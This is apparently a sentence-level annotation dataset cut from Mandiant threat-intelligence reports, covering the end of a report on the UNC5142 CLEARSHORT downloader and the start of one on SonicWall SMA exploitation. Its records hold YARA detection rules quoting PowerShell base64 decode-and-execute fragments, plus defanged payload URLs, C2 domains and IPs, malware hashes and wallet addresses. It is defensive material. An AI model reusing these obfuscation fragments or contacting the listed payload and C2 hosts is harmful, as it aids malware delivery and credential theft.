"doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "Acknowledgements\nSpecial acknowledgment to Cian Lynch for involvement in tracking the malware as a service distribution cluster, and to Blas Kojusner for assistance in analyzing infostealer malware samples.", "sentence_text": "We are also grateful to Geoff Ackerman for attribution efforts, as well as Muhammad Umer Khan and Elvis Miezitis for providing detection opportunities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s152-9ba659", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "We are also grateful to Geoff Ackerman for attribution efforts, as well as Muhammad Umer Khan and Elvis Miezitis for providing detection opportunities.", "sentence_text": "A special thanks goes to Yash Gupta for impactful feedback and coordination, and to Diana Ion for valuable suggestions on the blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s153-11d428", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "A special thanks goes to Yash Gupta for impactful feedback and coordination, and to Diana Ion for valuable suggestions on the blog post.", "sentence_text": "Detection Opportunities\nThe following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s154-d4a654", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "Detection Opportunities\nThe following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).", "sentence_text": "Detection Through Google Security Operations curated detections rule set.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s155-b9f3bc", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "Detection Through Google Security Operations curated detections rule set.", "sentence_text": "The activity detailed in this blog post is associated with several specific MITRE ATT&CK tactics and techniques, which are detected under the following rule names:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s156-bc83d9", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "The activity detailed in this blog post is associated with several specific MITRE ATT&CK tactics and techniques, which are detected under the following rule names:", "sentence_text": "Run Utility Spawning Suspicious Process Mshta Remote File Execution Powershell Launching Mshta Suspicious Dns Lookup Events", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s157-ad2ee2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 157, "context_before": "Run Utility Spawning Suspicious Process Mshta Remote File Execution Powershell Launching Mshta Suspicious Dns Lookup Events", "sentence_text": "To C2 Top Level Domains Suspicious Network Connections To Mediafire Mshta Launching Powershell Explorer Launches Powershell Hidden Execution MITRE ATT&CK YARA Rules rule M_Downloader_CLEARSHORT_1 { meta:\nauthor = \"Mandiant\" strings:\n$payload_b641 = \"ipconfig /flushdns\" base64 $payload_b642 = \"[System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s158-2c7b36", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 158, "context_before": "To C2 Top Level Domains Suspicious Network Connections To Mediafire Mshta Launching Powershell Explorer Launches Powershell Hidden Execution MITRE ATT&CK YARA Rules rule M_Downloader_CLEARSHORT_1 { meta:\nauthor = \"Mandiant\" strings:\n$payload_b641 = \"ipconfig /flushdns\" base64 $payload_b642 = \"[System.", "sentence_text": "Text.Encoding]::UTF8.GetString([System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s159-5ad39e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 159, "context_before": "Text.Encoding]::UTF8.GetString([System.", "sentence_text": "Convert]::FromBase64String(\" base64 $payload_b643 = \"[System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s161-a03c1d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "Diagnostics.", "sentence_text": "Process]::Start(\" base64 $payload_b644 = \"-ep", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s162-c889b2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 162, "context_before": "Process]::Start(\" base64 $payload_b644 = \"-ep", "sentence_text": "RemoteSigned -w 1 -enc\" base64 $payload_o1 = \"ipconfig /flushdns\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s163-772112", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 163, "context_before": "RemoteSigned -w 1 -enc\" base64 $payload_o1 = \"ipconfig /flushdns\"", "sentence_text": "nocase ascii wide $payload_o2 = \"[System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s164-cb5437", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 164, "context_before": "nocase ascii wide $payload_o2 = \"[System.", "sentence_text": "Text.Encoding]::UTF8.GetString([System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s165-a829e5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 165, "context_before": "Text.Encoding]::UTF8.GetString([System.", "sentence_text": "Convert]::FromBase64String(\" nocase ascii wide $payload_o3 = \"[System.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s167-fdfccc", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 167, "context_before": "Diagnostics.", "sentence_text": "Process]::Start(\" nocase ascii wide $payload_o4 = \"-ep", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s168-b2af53", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 168, "context_before": "Process]::Start(\" nocase ascii wide $payload_o4 = \"-ep", "sentence_text": "RemoteSigned -w 1 -enc\" nocase ascii wide $htm_o1 = \"title: \\\"Google Chrome\\\",\" $htm_o2 = \"PowerShell\" $htm_o3 = \"navigator.clipboard.writeText\" $htm_o4 = \"document.body.removeChild\" $htm_o5 = \"downloadButton.classList.add('downloadButton');\" $htm_o6 = \"getUserLanguage().substring(0, 2);\" $htm_o7 = \"translateContent(userLang);\" $htm_b64_1 = \"title: \\\"Google Chrome\\\",\" base64 $htm_b64_2 = \"PowerShell\" base64 $htm_b64_3 = \"navigator.clipboard.writeText\" base64 $htm_b64_4 = \"document.body.removeChild\" base64 $htm_b64_5 = \"downloadButton.classList.add('downloadButton');\" base64 $htm_b64_6 = \"getUserLanguage().substring(0, 2);\" base64 $htm_b64_7 = \"translateContent(userLang);\" base64 condition:\nfilesize<1MB and (4 of ($payload_b*) or 4 of ($payload_o*) or 4 of ($htm_b*) or 4 of ($htm_o*))\n}\nrule M_Downloader_CLEARSHORT_2 { meta:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s169-9ce6e5", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 169, "context_before": "RemoteSigned -w 1 -enc\" nocase ascii wide $htm_o1 = \"title: \\\"Google Chrome\\\",\" $htm_o2 = \"PowerShell\" $htm_o3 = \"navigator.clipboard.writeText\" $htm_o4 = \"document.body.removeChild\" $htm_o5 = \"downloadButton.classList.add('downloadButton');\" $htm_o6 = \"getUserLanguage().substring(0, 2);\" $htm_o7 = \"translateContent(userLang);\" $htm_b64_1 = \"title: \\\"Google Chrome\\\",\" base64 $htm_b64_2 = \"PowerShell\" base64 $htm_b64_3 = \"navigator.clipboard.writeText\" base64 $htm_b64_4 = \"document.body.removeChild\" base64 $htm_b64_5 = \"downloadButton.classList.add('downloadButton');\" base64 $htm_b64_6 = \"getUserLanguage().substring(0, 2);\" base64 $htm_b64_7 = \"translateContent(userLang);\" base64 condition:\nfilesize<1MB and (4 of ($payload_b*) or 4 of ($payload_o*) or 4 of ($htm_b*) or 4 of ($htm_o*))\n}\nrule M_Downloader_CLEARSHORT_2 { meta:", "sentence_text": "author = \"Mandiant\" strings:\n$htm1 = \"const base64HtmlContent\" $htm2 = \"return decodeURIComponent(escape(atob(str)));\" $htm3 = \"document.body.style.overflow = 'hidden';\" $htm4 = \"document.body.append(popupContainer);\" $htm5 = \"Object.assign(el.style, styles);\" $htm_b64_1 = \"const base64HtmlContent\" base64 $htm_b64_2 = \"return decodeURIComponent(escape(atob(str)));\" base64 $htm_b64_3 = \"document.body.style.overflow = 'hidden';\" base64 $htm_b64_4 = \"document.body.append(popupContainer);\" base64 $htm_b64_5 = \"Object.assign(el.style, styles);\" base64 condition:\nfilesize<1MB and 5 of ($htm*)\n}\nrule M_Downloader_CLEARSHORT_3\n{", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s170-44f0e9", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 170, "context_before": "author = \"Mandiant\" strings:\n$htm1 = \"const base64HtmlContent\" $htm2 = \"return decodeURIComponent(escape(atob(str)));\" $htm3 = \"document.body.style.overflow = 'hidden';\" $htm4 = \"document.body.append(popupContainer);\" $htm5 = \"Object.assign(el.style, styles);\" $htm_b64_1 = \"const base64HtmlContent\" base64 $htm_b64_2 = \"return decodeURIComponent(escape(atob(str)));\" base64 $htm_b64_3 = \"document.body.style.overflow = 'hidden';\" base64 $htm_b64_4 = \"document.body.append(popupContainer);\" base64 $htm_b64_5 = \"Object.assign(el.style, styles);\" base64 condition:\nfilesize<1MB and 5 of ($htm*)\n}\nrule M_Downloader_CLEARSHORT_3\n{", "sentence_text": "meta:\nauthor = \"Mandiant\" strings:\n$smart_contract1 = \"9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53\" nocase $smart_contract2 = \"8FBA1667BEF5EdA433928b220886A830488549BD\" nocase $smart_contract3 = \"53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA\" nocase $smart_contract2_hex = /38(46|66)(42|62)(41|61)31363637(42|62)(45|65)(46|66)35(45|65)(64|44)(41|61)343333393238(42|62)323230383836(41|61)383330343838353439(42|62)(44|64)/ $smart_contract1_hex = /39313739(64|44)(64|44)(61|41)38(42|62)323835303430(42|62)(66|46)333831(41|61)(41|61)(42|62)(62|42)38(61|41)31(66|46)34(61|41)31(62|42)38(63|43)3337(45|65)(64|44)3533/ $smart_contract3_hex = /3533(66|46)(64|44)3534(66|46)3535(43|63)3933(66|46)39(42|62)(43|63)(43|63)(41|61)343731(63|43)(44|64)30(43|63)(63|43)(62|42)(61|41)(42|62)(43|63)33(41|61)(63|43)(62|42)(64|44)33(45|65)34(41|61)(41|61)/ $enc_marker1 = \"4834734941444748553263432f34315662572f624\" $enc_marker2 = \"4834734941465775513263432f2b3257775772\" $c2_marker_capcha = \"743617074636861\" $c2_marker_https = \"68747470733a2f2f72\" $c2_marker_json = \"\\\"jsonrpc\\\":\\\"2.0\\\",\\\"id\\\":\\\"\" $str1 = /Windows\\s*\\+\\s*R/ nocase $str2 = /CTRL\\s*\\+\\s*V/ nocase $str3 = \"navigator.clipboard.writeText\" nocase $str4 = \"captcha\" nocase $str5 = \".innerHTML\" nocase $payload1 = \".shop\" base64 $payload2 = \"[scriptblock]::Create(\" nocase $payload3 = \"HTA:APPLICATION\" nocase condition:\nfilesize < 15MB and (any of ($smart_contract*) or any of ($enc_marker*) or all of ($c2_marker*) or all of ($str*) or all of ($payload*))\n}\nHost-Based IOCs\nNetwork-Based IOCs\nBlockchain-Based IOCs\nWallet Addresses\nSmart Contract Groups Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s171-741ac2", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 171, "context_before": "meta:\nauthor = \"Mandiant\" strings:\n$smart_contract1 = \"9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53\" nocase $smart_contract2 = \"8FBA1667BEF5EdA433928b220886A830488549BD\" nocase $smart_contract3 = \"53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA\" nocase $smart_contract2_hex = /38(46|66)(42|62)(41|61)31363637(42|62)(45|65)(46|66)35(45|65)(64|44)(41|61)343333393238(42|62)323230383836(41|61)383330343838353439(42|62)(44|64)/ $smart_contract1_hex = /39313739(64|44)(64|44)(61|41)38(42|62)323835303430(42|62)(66|46)333831(41|61)(41|61)(42|62)(62|42)38(61|41)31(66|46)34(61|41)31(62|42)38(63|43)3337(45|65)(64|44)3533/ $smart_contract3_hex = /3533(66|46)(64|44)3534(66|46)3535(43|63)3933(66|46)39(42|62)(43|63)(43|63)(41|61)343731(63|43)(44|64)30(43|63)(63|43)(62|42)(61|41)(42|62)(43|63)33(41|61)(63|43)(62|42)(64|44)33(45|65)34(41|61)(41|61)/ $enc_marker1 = \"4834734941444748553263432f34315662572f624\" $enc_marker2 = \"4834734941465775513263432f2b3257775772\" $c2_marker_capcha = \"743617074636861\" $c2_marker_https = \"68747470733a2f2f72\" $c2_marker_json = \"\\\"jsonrpc\\\":\\\"2.0\\\",\\\"id\\\":\\\"\" $str1 = /Windows\\s*\\+\\s*R/ nocase $str2 = /CTRL\\s*\\+\\s*V/ nocase $str3 = \"navigator.clipboard.writeText\" nocase $str4 = \"captcha\" nocase $str5 = \".innerHTML\" nocase $payload1 = \".shop\" base64 $payload2 = \"[scriptblock]::Create(\" nocase $payload3 = \"HTA:APPLICATION\" nocase condition:\nfilesize < 15MB and (any of ($smart_contract*) or any of ($enc_marker*) or all of ($c2_marker*) or all of ($str*) or all of ($payload*))\n}\nHost-Based IOCs\nNetwork-Based IOCs\nBlockchain-Based IOCs\nWallet Addresses\nSmart Contract Groups Posted in Threat Intelligence Related articles Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant •", "sentence_text": "39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s172-60b90b", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 172, "context_before": "39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "TLDs for lures and C2 | Base64 | Fake Chrome update lures November 2024", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s173-1ac436", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 173, "context_before": "TLDs for lures and C2 | Base64 | Fake Chrome update lures November 2024", "sentence_text": "| Introduction of the three-smart-contract system | Abuse of Cloudflare *.pages.dev for lures .shop /", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s174-13b611", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 174, "context_before": "| Introduction of the three-smart-contract system | Abuse of Cloudflare *.pages.dev for lures .shop /", "sentence_text": ".icu domains for recon | AES-GCM + Base64 | STUN server for victim IP recon January 2025 | Refinement of the three-contract system | Continued *.pages.dev abuse | AES-GCM + Base64 | New lures: Fake reCAPTCHA, Data Privacy agreements ATOMIC (macOS), VIDAR February 2025 | Secondary infrastructure deployed Payload URL stored in smart contract | Expanded use of *.pages.dev and new payload domains | AES-GCM + Base64 | New Lure:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s175-a7a10e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 175, "context_before": ".icu domains for recon | AES-GCM + Base64 | STUN server for victim IP recon January 2025 | Refinement of the three-contract system | Continued *.pages.dev abuse | AES-GCM + Base64 | New lures: Fake reCAPTCHA, Data Privacy agreements ATOMIC (macOS), VIDAR February 2025 | Secondary infrastructure deployed Payload URL stored in smart contract | Expanded use of *.pages.dev and new payload domains | AES-GCM + Base64 | New Lure:", "sentence_text": "Cloudflare \"Unusual Web Traffic\" error Recon check-in removed, replaced by cookie tracking May 2025 | Continued refinement of lures and payload delivery | *.pages.dev for lures, various TLDs for payloads | AES-GCM + Base64 | New Lure: \"Anti-Bot Verification\" for Windows & macOS Suspicious Dns Lookup Events", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s176-1ef49d", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 176, "context_before": "Cloudflare \"Unusual Web Traffic\" error Recon check-in removed, replaced by cookie tracking May 2025 | Continued refinement of lures and payload delivery | *.pages.dev for lures, various TLDs for payloads | AES-GCM + Base64 | New Lure: \"Anti-Bot Verification\" for Windows & macOS Suspicious Dns Lookup Events", "sentence_text": "To C2 Top Level Domains | TA0011 | T1071.001 bcbdb74f97092dfd68e7ec1d6770b6d1e1aae091f43bcebb0b7bce6c8188e310 | VIDAR 88019011af71af986a64f68316e80f30d3f57186aa62c3cef5ed139eb49a6842 | VIDAR 27105be1bdd9f15a1b1a2b0cc5de625e2ecd47fdeaed135321641eea86ad6cb0 | VIDAR 72d8fa46f402dcc4be78306d0535c9ace0eb9fabae59bd3ba3cc62a0bdf3db91 | LUMMAC.V2 3023b0331baff73ff894087d1a425ea4b2746caf514ada624370318f27e29c2c", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s177-f5d8e8", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 177, "context_before": "To C2 Top Level Domains | TA0011 | T1071.001 bcbdb74f97092dfd68e7ec1d6770b6d1e1aae091f43bcebb0b7bce6c8188e310 | VIDAR 88019011af71af986a64f68316e80f30d3f57186aa62c3cef5ed139eb49a6842 | VIDAR 27105be1bdd9f15a1b1a2b0cc5de625e2ecd47fdeaed135321641eea86ad6cb0 | VIDAR 72d8fa46f402dcc4be78306d0535c9ace0eb9fabae59bd3ba3cc62a0bdf3db91 | LUMMAC.V2 3023b0331baff73ff894087d1a425ea4b2746caf514ada624370318f27e29c2c", "sentence_text": "| LUMMAC.V2 4b47b55ae448668e549ffc04e82aee41ac10e3c8b183012a105faf2360fc5ec1 | RADTHIEF 091f9db54382708327f5bb1831a4626897b6710ffe11d835724be5c224a0cf83 | ATOMIC 2025-04-30 | hXXps://app.bytevista[.]cloud/wfree 2025-05-30 | hXXps://kimbeech[.]cfd/cap/verify.sh 2025-05-13 | hXXps://entrinidad[.]cfd/1/verify.sh 2025-05-11 | hXXps://tofukai[.]cfd/2/verify.sh 2025-05-08 | hXXps://privatunis[.]cfd/1/verify.sh 2025-05-01 | hXXps://salorttactical[.]top/2/verify.sh 2025-04-28 | hXXps://security-2u6g-log[.]com/1/verify.sh 2025-04-28 | hXXps://lammysecurity[.]com/4/verify.sh 2025-04-27 | hXXps://security-7f2c-run[.]com/2/verify.sh 2025-04-26 | hXXps://security-9y5v-scan[.]com/3/verify.sh 2025-04-25 | hXXps://security-9y5v-scan[.]com/7/verify.sh 2025-04-24 | hXXps://security-a2k8-go[.]com/6/verify.sh 2025-04-23 | hXXps://security-check-l2j4[.]com/verify.sh 2025-04-23 | hXXps://security-2k7q-check[.]com/1/verify.sh 2025-04-22 | hXXps://security-check-u8a6[.]com/2/verify.sh 2025-04-20 | hXXps://betiv[.]fun/7456f63a46cc318334a70159aa3c4291[.]txt 2025-04-03 | hXXps://captcha-cdn[.]com/verify.sh 2025-02-03 | hXXp://80[.]64[.]30[.]238/evix.xll 2025-02-03 | hXXps://raw[.]githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll saaadnesss[.]shop", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s178-bc5232", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 178, "context_before": "| LUMMAC.V2 4b47b55ae448668e549ffc04e82aee41ac10e3c8b183012a105faf2360fc5ec1 | RADTHIEF 091f9db54382708327f5bb1831a4626897b6710ffe11d835724be5c224a0cf83 | ATOMIC 2025-04-30 | hXXps://app.bytevista[.]cloud/wfree 2025-05-30 | hXXps://kimbeech[.]cfd/cap/verify.sh 2025-05-13 | hXXps://entrinidad[.]cfd/1/verify.sh 2025-05-11 | hXXps://tofukai[.]cfd/2/verify.sh 2025-05-08 | hXXps://privatunis[.]cfd/1/verify.sh 2025-05-01 | hXXps://salorttactical[.]top/2/verify.sh 2025-04-28 | hXXps://security-2u6g-log[.]com/1/verify.sh 2025-04-28 | hXXps://lammysecurity[.]com/4/verify.sh 2025-04-27 | hXXps://security-7f2c-run[.]com/2/verify.sh 2025-04-26 | hXXps://security-9y5v-scan[.]com/3/verify.sh 2025-04-25 | hXXps://security-9y5v-scan[.]com/7/verify.sh 2025-04-24 | hXXps://security-a2k8-go[.]com/6/verify.sh 2025-04-23 | hXXps://security-check-l2j4[.]com/verify.sh 2025-04-23 | hXXps://security-2k7q-check[.]com/1/verify.sh 2025-04-22 | hXXps://security-check-u8a6[.]com/2/verify.sh 2025-04-20 | hXXps://betiv[.]fun/7456f63a46cc318334a70159aa3c4291[.]txt 2025-04-03 | hXXps://captcha-cdn[.]com/verify.sh 2025-02-03 | hXXp://80[.]64[.]30[.]238/evix.xll 2025-02-03 | hXXps://raw[.]githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll saaadnesss[.]shop", "sentence_text": "| UNC5142 C2 Check-in lapkimeow[.]icu", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s179-4c2c80", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 179, "context_before": "| UNC5142 C2 Check-in lapkimeow[.]icu", "sentence_text": "| UNC5142 C2 Check-in ratatui[.]today | UNC5142 CLEARSHORT C2 Check-in technavix[.]cloud | UNC5142 CLEARSHORT C2 Check-in orange-service[.]xyz | UNC5142 CLEARSHORT C2 Check-in hfdjmoedkjf[.]asia", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s180-823169", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 180, "context_before": "| UNC5142 C2 Check-in ratatui[.]today | UNC5142 CLEARSHORT C2 Check-in technavix[.]cloud | UNC5142 CLEARSHORT C2 Check-in orange-service[.]xyz | UNC5142 CLEARSHORT C2 Check-in hfdjmoedkjf[.]asia", "sentence_text": "| UNC5142 CLEARSHORT C2 Check-in tlfiyat[.]shop | VIDAR C2 stchkr[.]rest | VIDAR C2 opbafindi[.]com | VIDAR C2 cxheerfulriver[.]pics | LUMMAC.V2 C2 importenptoc[.]com | LUMMAC.V2 C2 voicesharped[.]com | LUMMAC.V2 C2 inputrreparnt[.]com | LUMMAC.V2 C2 torpdidebar[.]com | LUMMAC.V2 C2 rebeldettern[.]com | LUMMAC.V2 C2 actiothreaz[.]com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s181-e3aeaf", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 181, "context_before": "| UNC5142 CLEARSHORT C2 Check-in tlfiyat[.]shop | VIDAR C2 stchkr[.]rest | VIDAR C2 opbafindi[.]com | VIDAR C2 cxheerfulriver[.]pics | LUMMAC.V2 C2 importenptoc[.]com | LUMMAC.V2 C2 voicesharped[.]com | LUMMAC.V2 C2 inputrreparnt[.]com | LUMMAC.V2 C2 torpdidebar[.]com | LUMMAC.V2 C2 rebeldettern[.]com | LUMMAC.V2 C2 actiothreaz[.]com", "sentence_text": "| LUMMAC.V2 C2 garulouscuto[.]com | LUMMAC.V2 C2 breedertremnd[.]com | LUMMAC.V2 C2 zenrichyourlife[.]tech | LUMMAC.V2 C2 pasteflawwed[.]world", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s182-0b8911", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 182, "context_before": "| LUMMAC.V2 C2 garulouscuto[.]com | LUMMAC.V2 C2 breedertremnd[.]com | LUMMAC.V2 C2 zenrichyourlife[.]tech | LUMMAC.V2 C2 pasteflawwed[.]world", "sentence_text": "| LUMMAC.V2 C2 hoyoverse[.]blog | LUMMAC.V2 C2 dsfljsdfjewf[.]info | LUMMAC.V2 C2 stormlegue[.]com | LUMMAC.V2 C2 blast-hubs[.]com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s183-aaf59e", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 183, "context_before": "| LUMMAC.V2 C2 hoyoverse[.]blog | LUMMAC.V2 C2 dsfljsdfjewf[.]info | LUMMAC.V2 C2 stormlegue[.]com | LUMMAC.V2 C2 blast-hubs[.]com", "sentence_text": "| LUMMAC.V2 C2 blastikcn[.]com |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s184-a33aaa", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 184, "context_before": "| LUMMAC.V2 C2 blastikcn[.]com |", "sentence_text": "LUMMAC.V2 C2 decreaserid[.]world | LUMMAC.V2 C2 95.217.240[.]67", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s185-b33b18", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 185, "context_before": "LUMMAC.V2 C2 decreaserid[.]world | LUMMAC.V2 C2 95.217.240[.]67", "sentence_text": "| VIDAR C2 37.27.182[.]109 | VIDAR C2 95.216.180[.]186", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s186-10b908", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 186, "context_before": "| VIDAR C2 37.27.182[.]109 | VIDAR C2 95.216.180[.]186", "sentence_text": "| VIDAR C2 82.115.223[.]9 | ATOMIC C2 91.240.118[.]2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s187-a29395", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 187, "context_before": "| VIDAR C2 82.115.223[.]9 | ATOMIC C2 91.240.118[.]2", "sentence_text": "| RADTHIEF C2 Second Level | 0x8FBA1667BEF5EdA433928b220886A830488549BD", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-36_mandiant_report-p1-s188-2a2b18", "source": "mandiant", "doc_id": "36_mandiant_report", "page_number": 1, "sentence_id": 188, "context_before": "| RADTHIEF C2 Second Level | 0x8FBA1667BEF5EdA433928b220886A830488549BD", "sentence_text": "| 0xd210e8a9f22Bc5b4C9B3982ED1c2E702D66A8a5E", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s1-8c56e1", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor | Google Cloud Blog Threat Intelligence Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor July 17, 2025 Google Threat Intelligence Group Stop attacks, reduce risk, and advance your security.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s2-9d75de", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor | Google Cloud Blog Threat Intelligence Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor July 17, 2025 Google Threat Intelligence Group Stop attacks, reduce risk, and advance your security.", "sentence_text": "Written by: Josh Goddard, Zander Work, Dimiter Andonov UPDATE (Sep 16):\nClarified hunting guidance specifics surrounding ld.so.preload files.\nUPDATE (July 30):", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s3-0062cd", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Written by: Josh Goddard, Zander Work, Dimiter Andonov UPDATE (Sep 16):\nClarified hunting guidance specifics surrounding ld.so.preload files.\nUPDATE (July 30):", "sentence_text": "Added additional network IOC identified by Sonicwall as being associated with OVERSTEP.", "relevant": "no", "tactic": null, "techniques": null, 